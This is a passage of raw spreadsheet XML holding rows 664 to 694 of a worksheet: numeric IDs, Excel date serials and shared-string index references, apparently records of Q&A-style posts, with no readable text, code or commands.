      <c r="D664" s="9" t="s">
        <v>3710</v>
      </c>
      <c r="E664" s="9">
        <v>1</v>
      </c>
      <c r="F664" s="9" t="s">
        <v>1865</v>
      </c>
      <c r="G664" s="10">
        <v>39785.685416666667</v>
      </c>
      <c r="H664" s="9">
        <v>12950</v>
      </c>
      <c r="I664" s="9" t="s">
        <v>3701</v>
      </c>
      <c r="J664" s="10">
        <v>39785.681250000001</v>
      </c>
      <c r="K664" s="9" t="s">
        <v>1483</v>
      </c>
      <c r="L664" s="7">
        <v>3</v>
      </c>
      <c r="M664" s="7">
        <v>1</v>
      </c>
      <c r="Q664" s="9" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="665" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A665" s="3">
        <v>337794</v>
      </c>
      <c r="B665" s="3" t="s">
        <v>486</v>
      </c>
      <c r="C665" s="9" t="s">
        <v>3711</v>
      </c>
      <c r="D665" s="9" t="s">
        <v>3712</v>
      </c>
      <c r="E665" s="9">
        <v>38254</v>
      </c>
      <c r="F665" s="9" t="s">
        <v>3713</v>
      </c>
      <c r="G665" s="10">
        <v>42844.393750000003</v>
      </c>
      <c r="H665" s="9">
        <v>433905</v>
      </c>
      <c r="I665" s="9" t="s">
        <v>3714</v>
      </c>
      <c r="J665" s="10">
        <v>42837.77847222222</v>
      </c>
      <c r="K665" s="3" t="s">
        <v>487</v>
      </c>
      <c r="L665" s="4">
        <v>3</v>
      </c>
      <c r="M665" s="4">
        <v>1</v>
      </c>
      <c r="N665" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O665" s="3"/>
      <c r="P665" s="3"/>
      <c r="Q665" s="3"/>
    </row>
    <row r="666" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A666" s="3">
        <v>337817</v>
      </c>
      <c r="B666" s="3" t="s">
        <v>488</v>
      </c>
      <c r="C666" s="9" t="s">
        <v>3715</v>
      </c>
      <c r="D666" s="9" t="s">
        <v>3716</v>
      </c>
      <c r="E666" s="9">
        <v>2333499</v>
      </c>
      <c r="F666" s="9" t="s">
        <v>3717</v>
      </c>
      <c r="G666" s="10">
        <v>42790.895833333336</v>
      </c>
      <c r="H666" s="9">
        <v>4519059</v>
      </c>
      <c r="I666" s="9" t="s">
        <v>3718</v>
      </c>
      <c r="J666" s="10">
        <v>42155.419444444444</v>
      </c>
      <c r="K666" s="3" t="s">
        <v>489</v>
      </c>
      <c r="L666" s="4">
        <v>7</v>
      </c>
      <c r="M666" s="4">
        <v>5</v>
      </c>
      <c r="N666" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O666" s="3"/>
      <c r="P666" s="3"/>
      <c r="Q666" s="3"/>
    </row>
    <row r="667" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A667" s="3">
        <v>339077</v>
      </c>
      <c r="B667" s="3" t="s">
        <v>600</v>
      </c>
      <c r="C667" s="9" t="s">
        <v>3719</v>
      </c>
      <c r="D667" s="9" t="s">
        <v>3720</v>
      </c>
      <c r="E667" s="9">
        <v>3075942</v>
      </c>
      <c r="F667" s="9" t="s">
        <v>3721</v>
      </c>
      <c r="G667" s="10">
        <v>42424.7</v>
      </c>
      <c r="H667" s="9">
        <v>3075942</v>
      </c>
      <c r="I667" s="9" t="s">
        <v>3721</v>
      </c>
      <c r="J667" s="10">
        <v>42424.698611111111</v>
      </c>
      <c r="K667" s="3" t="s">
        <v>601</v>
      </c>
      <c r="L667" s="4">
        <v>4</v>
      </c>
      <c r="M667" s="4">
        <v>2</v>
      </c>
      <c r="N667" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O667" s="3"/>
      <c r="P667" s="3"/>
      <c r="Q667" s="3"/>
    </row>
    <row r="668" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A668" s="9">
        <v>339180</v>
      </c>
      <c r="B668" s="9" t="s">
        <v>1484</v>
      </c>
      <c r="C668" s="9" t="s">
        <v>3722</v>
      </c>
      <c r="D668" s="9" t="s">
        <v>3723</v>
      </c>
      <c r="E668" s="9">
        <v>31671</v>
      </c>
      <c r="F668" s="9" t="s">
        <v>3724</v>
      </c>
      <c r="G668" s="10">
        <v>39786.013888888891</v>
      </c>
      <c r="H668" s="9">
        <v>9021</v>
      </c>
      <c r="I668" s="9" t="s">
        <v>2281</v>
      </c>
      <c r="J668" s="10">
        <v>39785.995833333334</v>
      </c>
      <c r="K668" s="9" t="s">
        <v>1485</v>
      </c>
      <c r="L668" s="7">
        <v>3</v>
      </c>
      <c r="M668" s="7">
        <v>1</v>
      </c>
      <c r="N668" s="9" t="s">
        <v>702</v>
      </c>
      <c r="O668" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="669" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A669" s="3">
        <v>339247</v>
      </c>
      <c r="B669" s="3" t="s">
        <v>602</v>
      </c>
      <c r="C669" s="9" t="s">
        <v>3725</v>
      </c>
      <c r="D669" s="9" t="s">
        <v>3726</v>
      </c>
      <c r="E669" s="9">
        <v>327563</v>
      </c>
      <c r="F669" s="9" t="s">
        <v>3674</v>
      </c>
      <c r="G669" s="10">
        <v>40968.363194444442</v>
      </c>
      <c r="H669" s="9">
        <v>34088</v>
      </c>
      <c r="I669" s="9" t="s">
        <v>3675</v>
      </c>
      <c r="J669" s="10">
        <v>39857.627083333333</v>
      </c>
      <c r="K669" s="3" t="s">
        <v>603</v>
      </c>
      <c r="L669" s="4">
        <v>3</v>
      </c>
      <c r="M669" s="4">
        <v>1</v>
      </c>
      <c r="N669" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O669" s="3"/>
      <c r="P669" s="3"/>
      <c r="Q669" s="3"/>
    </row>
    <row r="670" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A670" s="9">
        <v>339880</v>
      </c>
      <c r="B670" s="9" t="s">
        <v>1486</v>
      </c>
      <c r="C670" s="9" t="s">
        <v>3727</v>
      </c>
      <c r="D670" s="9" t="s">
        <v>3728</v>
      </c>
      <c r="E670" s="9">
        <v>34590</v>
      </c>
      <c r="F670" s="9" t="s">
        <v>3729</v>
      </c>
      <c r="G670" s="10">
        <v>40231.109722222223</v>
      </c>
      <c r="H670" s="9">
        <v>15168</v>
      </c>
      <c r="I670" s="9" t="s">
        <v>2707</v>
      </c>
      <c r="J670" s="10">
        <v>39786.82916666667</v>
      </c>
      <c r="K670" s="9" t="s">
        <v>1487</v>
      </c>
      <c r="L670" s="7">
        <v>7</v>
      </c>
      <c r="M670" s="7">
        <v>4</v>
      </c>
      <c r="N670" s="9" t="s">
        <v>705</v>
      </c>
      <c r="O670" s="9" t="s">
        <v>707</v>
      </c>
    </row>
    <row r="671" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A671" s="3">
        <v>340488</v>
      </c>
      <c r="B671" s="3" t="s">
        <v>604</v>
      </c>
      <c r="C671" s="9" t="s">
        <v>3730</v>
      </c>
      <c r="D671" s="9" t="s">
        <v>3731</v>
      </c>
      <c r="E671" s="9">
        <v>34806</v>
      </c>
      <c r="F671" s="9" t="s">
        <v>3732</v>
      </c>
      <c r="G671" s="10">
        <v>39791.657638888886</v>
      </c>
      <c r="H671" s="9">
        <v>3848</v>
      </c>
      <c r="I671" s="9" t="s">
        <v>3733</v>
      </c>
      <c r="J671" s="10">
        <v>39790.779861111114</v>
      </c>
      <c r="K671" s="3" t="s">
        <v>605</v>
      </c>
      <c r="L671" s="4">
        <v>3</v>
      </c>
      <c r="M671" s="4">
        <v>1</v>
      </c>
      <c r="N671" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O671" s="3"/>
      <c r="P671" s="3"/>
      <c r="Q671" s="3"/>
    </row>
    <row r="672" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A672" s="9">
        <v>340816</v>
      </c>
      <c r="B672" s="9" t="s">
        <v>1488</v>
      </c>
      <c r="C672" s="9" t="s">
        <v>3734</v>
      </c>
      <c r="D672" s="9" t="s">
        <v>3735</v>
      </c>
      <c r="E672" s="9">
        <v>26566</v>
      </c>
      <c r="F672" s="9" t="s">
        <v>3736</v>
      </c>
      <c r="G672" s="10">
        <v>39786.649305555555</v>
      </c>
      <c r="H672" s="9">
        <v>26566</v>
      </c>
      <c r="I672" s="9" t="s">
        <v>3736</v>
      </c>
      <c r="J672" s="10">
        <v>39786.616666666669</v>
      </c>
      <c r="K672" s="9" t="s">
        <v>1489</v>
      </c>
      <c r="L672" s="7">
        <v>2</v>
      </c>
      <c r="M672" s="7">
        <v>1</v>
      </c>
      <c r="Q672" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="673" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A673" s="9">
        <v>342528</v>
      </c>
      <c r="B673" s="9" t="s">
        <v>1490</v>
      </c>
      <c r="C673" s="9" t="s">
        <v>3737</v>
      </c>
      <c r="D673" s="9" t="s">
        <v>3738</v>
      </c>
      <c r="E673" s="9">
        <v>866022</v>
      </c>
      <c r="F673" s="9" t="s">
        <v>3739</v>
      </c>
      <c r="G673" s="10">
        <v>41366.636805555558</v>
      </c>
      <c r="H673" s="9">
        <v>781</v>
      </c>
      <c r="I673" s="9" t="s">
        <v>3740</v>
      </c>
      <c r="J673" s="10">
        <v>39794.010416666664</v>
      </c>
      <c r="K673" s="9" t="s">
        <v>1491</v>
      </c>
      <c r="L673" s="7">
        <v>4</v>
      </c>
      <c r="M673" s="7">
        <v>2</v>
      </c>
      <c r="N673" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="674" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A674" s="3">
        <v>342821</v>
      </c>
      <c r="B674" s="3" t="s">
        <v>606</v>
      </c>
      <c r="C674" s="9" t="s">
        <v>3741</v>
      </c>
      <c r="D674" s="9" t="s">
        <v>3742</v>
      </c>
      <c r="E674" s="9">
        <v>8946</v>
      </c>
      <c r="F674" s="9" t="s">
        <v>3743</v>
      </c>
      <c r="G674" s="10">
        <v>42701.881249999999</v>
      </c>
      <c r="H674" s="9">
        <v>1672920</v>
      </c>
      <c r="I674" s="9" t="s">
        <v>3744</v>
      </c>
      <c r="J674" s="10">
        <v>42699.371527777781</v>
      </c>
      <c r="K674" s="3" t="s">
        <v>607</v>
      </c>
      <c r="L674" s="4">
        <v>6</v>
      </c>
      <c r="M674" s="4">
        <v>4</v>
      </c>
      <c r="N674" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O674" s="3" t="s">
        <v>706</v>
      </c>
      <c r="P674" s="3"/>
      <c r="Q674" s="3"/>
    </row>
    <row r="675" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A675" s="3">
        <v>343007</v>
      </c>
      <c r="B675" s="3" t="s">
        <v>608</v>
      </c>
      <c r="C675" s="9" t="s">
        <v>3745</v>
      </c>
      <c r="D675" s="9" t="s">
        <v>3746</v>
      </c>
      <c r="E675" s="9">
        <v>8946</v>
      </c>
      <c r="F675" s="9" t="s">
        <v>3743</v>
      </c>
      <c r="G675" s="10">
        <v>42006.261805555558</v>
      </c>
      <c r="H675" s="9">
        <v>363573</v>
      </c>
      <c r="I675" s="9" t="s">
        <v>3747</v>
      </c>
      <c r="J675" s="10">
        <v>42006.1875</v>
      </c>
      <c r="K675" s="3" t="s">
        <v>609</v>
      </c>
      <c r="L675" s="4">
        <v>13</v>
      </c>
      <c r="M675" s="4">
        <v>11</v>
      </c>
      <c r="N675" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O675" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P675" s="3"/>
      <c r="Q675" s="3"/>
    </row>
    <row r="676" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A676" s="9">
        <v>343274</v>
      </c>
      <c r="B676" s="9" t="s">
        <v>1492</v>
      </c>
      <c r="C676" s="9" t="s">
        <v>3748</v>
      </c>
      <c r="D676" s="9" t="s">
        <v>3749</v>
      </c>
      <c r="E676" s="9">
        <v>191</v>
      </c>
      <c r="F676" s="9" t="s">
        <v>3750</v>
      </c>
      <c r="G676" s="10">
        <v>39787.414583333331</v>
      </c>
      <c r="H676" s="9">
        <v>191</v>
      </c>
      <c r="I676" s="9" t="s">
        <v>3750</v>
      </c>
      <c r="J676" s="10">
        <v>39787.382638888892</v>
      </c>
      <c r="K676" s="9" t="s">
        <v>1493</v>
      </c>
      <c r="L676" s="7">
        <v>2</v>
      </c>
      <c r="M676" s="7">
        <v>1</v>
      </c>
      <c r="Q676" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="677" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A677" s="9">
        <v>343584</v>
      </c>
      <c r="B677" s="9" t="s">
        <v>1494</v>
      </c>
      <c r="C677" s="9" t="s">
        <v>3751</v>
      </c>
      <c r="D677" s="9" t="s">
        <v>3752</v>
      </c>
      <c r="E677" s="9">
        <v>1527</v>
      </c>
      <c r="F677" s="9" t="s">
        <v>1983</v>
      </c>
      <c r="G677" s="10">
        <v>39909.536111111112</v>
      </c>
      <c r="H677" s="9">
        <v>8709</v>
      </c>
      <c r="I677" s="9" t="s">
        <v>3484</v>
      </c>
      <c r="J677" s="10">
        <v>39787.53402777778</v>
      </c>
      <c r="K677" s="9" t="s">
        <v>1495</v>
      </c>
      <c r="L677" s="7">
        <v>3</v>
      </c>
      <c r="M677" s="7">
        <v>1</v>
      </c>
      <c r="N677" s="9" t="s">
        <v>701</v>
      </c>
      <c r="O677" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="678" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A678" s="9">
        <v>343654</v>
      </c>
      <c r="B678" s="9" t="s">
        <v>1496</v>
      </c>
      <c r="C678" s="9" t="s">
        <v>3753</v>
      </c>
      <c r="D678" s="9" t="s">
        <v>3754</v>
      </c>
      <c r="E678" s="9">
        <v>21197</v>
      </c>
      <c r="F678" s="9" t="s">
        <v>3755</v>
      </c>
      <c r="G678" s="10">
        <v>39787.606944444444</v>
      </c>
      <c r="H678" s="9">
        <v>21197</v>
      </c>
      <c r="I678" s="9" t="s">
        <v>3755</v>
      </c>
      <c r="J678" s="10">
        <v>39787.588888888888</v>
      </c>
      <c r="K678" s="9" t="s">
        <v>1497</v>
      </c>
      <c r="L678" s="7">
        <v>4</v>
      </c>
      <c r="M678" s="7">
        <v>3</v>
      </c>
      <c r="Q678" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="679" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A679" s="3">
        <v>344073</v>
      </c>
      <c r="B679" s="3" t="s">
        <v>610</v>
      </c>
      <c r="C679" s="9" t="s">
        <v>3756</v>
      </c>
      <c r="D679" s="9" t="s">
        <v>3757</v>
      </c>
      <c r="E679" s="9">
        <v>21691</v>
      </c>
      <c r="F679" s="9" t="s">
        <v>3758</v>
      </c>
      <c r="G679" s="10">
        <v>39787.640277777777</v>
      </c>
      <c r="H679" s="9">
        <v>21691</v>
      </c>
      <c r="I679" s="9" t="s">
        <v>3758</v>
      </c>
      <c r="J679" s="10">
        <v>39787.636111111111</v>
      </c>
      <c r="K679" s="3" t="s">
        <v>611</v>
      </c>
      <c r="L679" s="4">
        <v>3</v>
      </c>
      <c r="M679" s="4">
        <v>1</v>
      </c>
      <c r="N679" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O679" s="3" t="s">
        <v>703</v>
      </c>
      <c r="P679" s="3"/>
      <c r="Q679" s="3"/>
    </row>
    <row r="680" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A680" s="3">
        <v>344213</v>
      </c>
      <c r="B680" s="3" t="s">
        <v>644</v>
      </c>
      <c r="C680" s="9" t="s">
        <v>3759</v>
      </c>
      <c r="D680" s="9" t="s">
        <v>3760</v>
      </c>
      <c r="E680" s="9">
        <v>39106</v>
      </c>
      <c r="F680" s="9" t="s">
        <v>3761</v>
      </c>
      <c r="G680" s="10">
        <v>41010.629861111112</v>
      </c>
      <c r="H680" s="9">
        <v>1220835</v>
      </c>
      <c r="I680" s="9" t="s">
        <v>3762</v>
      </c>
      <c r="J680" s="10">
        <v>41009.496527777781</v>
      </c>
      <c r="K680" s="3" t="s">
        <v>645</v>
      </c>
      <c r="L680" s="4">
        <v>3</v>
      </c>
      <c r="M680" s="4">
        <v>1</v>
      </c>
      <c r="N680" s="3" t="s">
        <v>696</v>
      </c>
      <c r="O680" s="3"/>
      <c r="P680" s="3"/>
      <c r="Q680" s="3"/>
    </row>
    <row r="681" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A681" s="9">
        <v>344249</v>
      </c>
      <c r="B681" s="9" t="s">
        <v>1498</v>
      </c>
      <c r="C681" s="9" t="s">
        <v>3763</v>
      </c>
      <c r="D681" s="9" t="s">
        <v>3764</v>
      </c>
      <c r="E681" s="9">
        <v>43679</v>
      </c>
      <c r="F681" s="9" t="s">
        <v>3765</v>
      </c>
      <c r="G681" s="10">
        <v>39787.663194444445</v>
      </c>
      <c r="H681" s="9">
        <v>43679</v>
      </c>
      <c r="I681" s="9" t="s">
        <v>3765</v>
      </c>
      <c r="J681" s="10">
        <v>39787.656944444447</v>
      </c>
      <c r="K681" s="9" t="s">
        <v>1499</v>
      </c>
      <c r="L681" s="7">
        <v>2</v>
      </c>
      <c r="M681" s="7">
        <v>1</v>
      </c>
      <c r="N681" s="9" t="s">
        <v>700</v>
      </c>
      <c r="O681" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="682" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A682" s="9">
        <v>345147</v>
      </c>
      <c r="B682" s="9" t="s">
        <v>1500</v>
      </c>
      <c r="C682" s="9" t="s">
        <v>3766</v>
      </c>
      <c r="D682" s="9" t="s">
        <v>3767</v>
      </c>
      <c r="E682" s="9">
        <v>397817</v>
      </c>
      <c r="F682" s="9" t="s">
        <v>3768</v>
      </c>
      <c r="G682" s="10">
        <v>43242.365972222222</v>
      </c>
      <c r="H682" s="9">
        <v>12597</v>
      </c>
      <c r="I682" s="9" t="s">
        <v>3769</v>
      </c>
      <c r="J682" s="10">
        <v>39787.915277777778</v>
      </c>
      <c r="K682" s="9" t="s">
        <v>1501</v>
      </c>
      <c r="L682" s="7">
        <v>4</v>
      </c>
      <c r="M682" s="7">
        <v>2</v>
      </c>
      <c r="N682" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="683" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A683" s="3">
        <v>345526</v>
      </c>
      <c r="B683" s="3" t="s">
        <v>646</v>
      </c>
      <c r="C683" s="9" t="s">
        <v>3770</v>
      </c>
      <c r="D683" s="9" t="s">
        <v>3771</v>
      </c>
      <c r="E683" s="9">
        <v>23118</v>
      </c>
      <c r="F683" s="9" t="s">
        <v>3772</v>
      </c>
      <c r="G683" s="10">
        <v>41711.730555555558</v>
      </c>
      <c r="H683" s="9">
        <v>1390116</v>
      </c>
      <c r="I683" s="9" t="s">
        <v>3773</v>
      </c>
      <c r="J683" s="10">
        <v>41711.729861111111</v>
      </c>
      <c r="K683" s="3" t="s">
        <v>647</v>
      </c>
      <c r="L683" s="4">
        <v>5</v>
      </c>
      <c r="M683" s="4">
        <v>3</v>
      </c>
      <c r="N683" s="3" t="s">
        <v>706</v>
      </c>
      <c r="O683" s="3" t="s">
        <v>703</v>
      </c>
      <c r="P683" s="3"/>
      <c r="Q683" s="3"/>
    </row>
    <row r="684" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A684" s="9">
        <v>346349</v>
      </c>
      <c r="B684" s="9" t="s">
        <v>1502</v>
      </c>
      <c r="C684" s="9" t="s">
        <v>3774</v>
      </c>
      <c r="D684" s="9" t="s">
        <v>3775</v>
      </c>
      <c r="E684" s="9">
        <v>15168</v>
      </c>
      <c r="F684" s="9" t="s">
        <v>2707</v>
      </c>
      <c r="G684" s="10">
        <v>39788.640972222223</v>
      </c>
      <c r="H684" s="9">
        <v>2974</v>
      </c>
      <c r="I684" s="9" t="s">
        <v>2672</v>
      </c>
      <c r="J684" s="10">
        <v>39788.634027777778</v>
      </c>
      <c r="K684" s="9" t="s">
        <v>1503</v>
      </c>
      <c r="L684" s="7">
        <v>5</v>
      </c>
      <c r="M684" s="7">
        <v>3</v>
      </c>
      <c r="N684" s="9" t="s">
        <v>701</v>
      </c>
      <c r="O684" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="685" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A685" s="9">
        <v>348052</v>
      </c>
      <c r="B685" s="9" t="s">
        <v>1504</v>
      </c>
      <c r="C685" s="9" t="s">
        <v>3776</v>
      </c>
      <c r="D685" s="9" t="s">
        <v>3777</v>
      </c>
      <c r="E685" s="9">
        <v>26334</v>
      </c>
      <c r="F685" s="9" t="s">
        <v>2858</v>
      </c>
      <c r="G685" s="10">
        <v>39794.744444444441</v>
      </c>
      <c r="H685" s="9">
        <v>4893</v>
      </c>
      <c r="I685" s="9" t="s">
        <v>3321</v>
      </c>
      <c r="J685" s="10">
        <v>39793.822222222225</v>
      </c>
      <c r="K685" s="9" t="s">
        <v>1505</v>
      </c>
      <c r="L685" s="7">
        <v>3</v>
      </c>
      <c r="M685" s="7">
        <v>1</v>
      </c>
      <c r="N685" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="686" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A686" s="9">
        <v>348210</v>
      </c>
      <c r="B686" s="9" t="s">
        <v>1506</v>
      </c>
      <c r="C686" s="9" t="s">
        <v>3778</v>
      </c>
      <c r="D686" s="9" t="s">
        <v>3779</v>
      </c>
      <c r="E686" s="9">
        <v>2035029</v>
      </c>
      <c r="F686" s="9" t="s">
        <v>3780</v>
      </c>
      <c r="G686" s="10">
        <v>41712.302083333336</v>
      </c>
      <c r="H686" s="9">
        <v>3401480</v>
      </c>
      <c r="I686" s="9" t="s">
        <v>3781</v>
      </c>
      <c r="J686" s="10">
        <v>41712.301388888889</v>
      </c>
      <c r="K686" s="9" t="s">
        <v>1507</v>
      </c>
      <c r="L686" s="7">
        <v>8</v>
      </c>
      <c r="M686" s="7">
        <v>6</v>
      </c>
      <c r="N686" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="687" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A687" s="9">
        <v>348363</v>
      </c>
      <c r="B687" s="9" t="s">
        <v>1508</v>
      </c>
      <c r="C687" s="9" t="s">
        <v>3782</v>
      </c>
      <c r="D687" s="9" t="s">
        <v>3783</v>
      </c>
      <c r="E687" s="9">
        <v>211563</v>
      </c>
      <c r="F687" s="9" t="s">
        <v>2020</v>
      </c>
      <c r="G687" s="10">
        <v>40979.218055555553</v>
      </c>
      <c r="H687" s="9">
        <v>14027</v>
      </c>
      <c r="I687" s="9" t="s">
        <v>3784</v>
      </c>
      <c r="J687" s="10">
        <v>39790.155555555553</v>
      </c>
      <c r="K687" s="9" t="s">
        <v>1509</v>
      </c>
      <c r="L687" s="7">
        <v>4</v>
      </c>
      <c r="M687" s="7">
        <v>2</v>
      </c>
      <c r="N687" s="9" t="s">
        <v>697</v>
      </c>
      <c r="O687" s="9" t="s">
        <v>712</v>
      </c>
      <c r="P687" s="9" t="s">
        <v>715</v>
      </c>
      <c r="Q687" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="688" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A688" s="9">
        <v>349094</v>
      </c>
      <c r="B688" s="9" t="s">
        <v>1510</v>
      </c>
      <c r="C688" s="9" t="s">
        <v>3785</v>
      </c>
      <c r="D688" s="9" t="s">
        <v>3786</v>
      </c>
      <c r="E688" s="9">
        <v>11541</v>
      </c>
      <c r="F688" s="9" t="s">
        <v>3787</v>
      </c>
      <c r="G688" s="10">
        <v>39791.199305555558</v>
      </c>
      <c r="H688" s="9">
        <v>11541</v>
      </c>
      <c r="I688" s="9" t="s">
        <v>3787</v>
      </c>
      <c r="J688" s="10">
        <v>39790.436805555553</v>
      </c>
      <c r="K688" s="9" t="s">
        <v>1511</v>
      </c>
      <c r="L688" s="7">
        <v>2</v>
      </c>
      <c r="M688" s="7">
        <v>1</v>
      </c>
      <c r="N688" s="9" t="s">
        <v>703</v>
      </c>
      <c r="Q688" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="689" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A689" s="9">
        <v>350177</v>
      </c>
      <c r="B689" s="9" t="s">
        <v>1512</v>
      </c>
      <c r="C689" s="9" t="s">
        <v>3788</v>
      </c>
      <c r="D689" s="9" t="s">
        <v>3789</v>
      </c>
      <c r="E689" s="9">
        <v>26004</v>
      </c>
      <c r="F689" s="9" t="s">
        <v>2888</v>
      </c>
      <c r="G689" s="10">
        <v>39902.347222222219</v>
      </c>
      <c r="H689" s="9">
        <v>5640</v>
      </c>
      <c r="I689" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J689" s="10">
        <v>39875.883333333331</v>
      </c>
      <c r="K689" s="9" t="s">
        <v>1513</v>
      </c>
      <c r="L689" s="7">
        <v>3</v>
      </c>
      <c r="M689" s="7">
        <v>1</v>
      </c>
      <c r="N689" s="9" t="s">
        <v>704</v>
      </c>
      <c r="O689" s="9" t="s">
        <v>708</v>
      </c>
      <c r="P689" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="690" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A690" s="9">
        <v>350705</v>
      </c>
      <c r="B690" s="9" t="s">
        <v>1514</v>
      </c>
      <c r="C690" s="9" t="s">
        <v>3790</v>
      </c>
      <c r="D690" s="9" t="s">
        <v>3791</v>
      </c>
      <c r="E690" s="9">
        <v>1463</v>
      </c>
      <c r="F690" s="9" t="s">
        <v>3792</v>
      </c>
      <c r="G690" s="10">
        <v>39790.883333333331</v>
      </c>
      <c r="H690" s="9">
        <v>15880</v>
      </c>
      <c r="I690" s="9" t="s">
        <v>3793</v>
      </c>
      <c r="J690" s="10">
        <v>39790.854861111111</v>
      </c>
      <c r="K690" s="9" t="s">
        <v>1515</v>
      </c>
      <c r="L690" s="7">
        <v>3</v>
      </c>
      <c r="M690" s="7">
        <v>1</v>
      </c>
      <c r="Q690" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="691" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A691" s="9">
        <v>351409</v>
      </c>
      <c r="B691" s="9" t="s">
        <v>1516</v>
      </c>
      <c r="C691" s="9" t="s">
        <v>3794</v>
      </c>
      <c r="D691" s="9" t="s">
        <v>3795</v>
      </c>
      <c r="E691" s="9">
        <v>1459669</v>
      </c>
      <c r="F691" s="9" t="s">
        <v>3796</v>
      </c>
      <c r="G691" s="10">
        <v>42556.614583333336</v>
      </c>
      <c r="H691" s="9">
        <v>964243</v>
      </c>
      <c r="I691" s="9" t="s">
        <v>3797</v>
      </c>
      <c r="J691" s="10">
        <v>41999.981944444444</v>
      </c>
      <c r="K691" s="9" t="s">
        <v>1517</v>
      </c>
      <c r="L691" s="7">
        <v>10</v>
      </c>
      <c r="M691" s="7">
        <v>8</v>
      </c>
      <c r="N691" s="9" t="s">
        <v>698</v>
      </c>
      <c r="O691" s="9" t="s">
        <v>700</v>
      </c>
      <c r="P691" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="692" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A692" s="9">
        <v>351470</v>
      </c>
      <c r="B692" s="9" t="s">
        <v>1518</v>
      </c>
      <c r="C692" s="9" t="s">
        <v>3798</v>
      </c>
      <c r="D692" s="9" t="s">
        <v>3799</v>
      </c>
      <c r="E692" s="9">
        <v>28832</v>
      </c>
      <c r="F692" s="9" t="s">
        <v>3800</v>
      </c>
      <c r="G692" s="10">
        <v>39791.050694444442</v>
      </c>
      <c r="H692" s="9">
        <v>264</v>
      </c>
      <c r="I692" s="9" t="s">
        <v>3801</v>
      </c>
      <c r="J692" s="10">
        <v>39791.044444444444</v>
      </c>
      <c r="K692" s="9" t="s">
        <v>1519</v>
      </c>
      <c r="L692" s="7">
        <v>3</v>
      </c>
      <c r="M692" s="7">
        <v>1</v>
      </c>
      <c r="N692" s="9" t="s">
        <v>698</v>
      </c>
      <c r="O692" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="693" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A693" s="9">
        <v>351615</v>
      </c>
      <c r="B693" s="9" t="s">
        <v>1520</v>
      </c>
      <c r="C693" s="9" t="s">
        <v>3802</v>
      </c>
      <c r="D693" s="9" t="s">
        <v>3803</v>
      </c>
      <c r="E693" s="9">
        <v>17815</v>
      </c>
      <c r="F693" s="9" t="s">
        <v>3804</v>
      </c>
      <c r="G693" s="10">
        <v>39833.638888888891</v>
      </c>
      <c r="H693" s="9">
        <v>17815</v>
      </c>
      <c r="I693" s="9" t="s">
        <v>3804</v>
      </c>
      <c r="J693" s="10">
        <v>39833.490972222222</v>
      </c>
      <c r="K693" s="9" t="s">
        <v>1521</v>
      </c>
      <c r="L693" s="7">
        <v>3</v>
      </c>
      <c r="M693" s="7">
        <v>1</v>
      </c>
      <c r="N693" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="694" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A694" s="9">
        <v>352335</v>
      </c>
      <c r="B694" s="9" t="s">
        <v>1522</v>
      </c>
      <c r="C694" s="9" t="s">
        <v>3805</v>
      </c>
      <c r="D694" s="9" t="s">
        <v>3806</v>
      </c>
      <c r="E694" s="9">
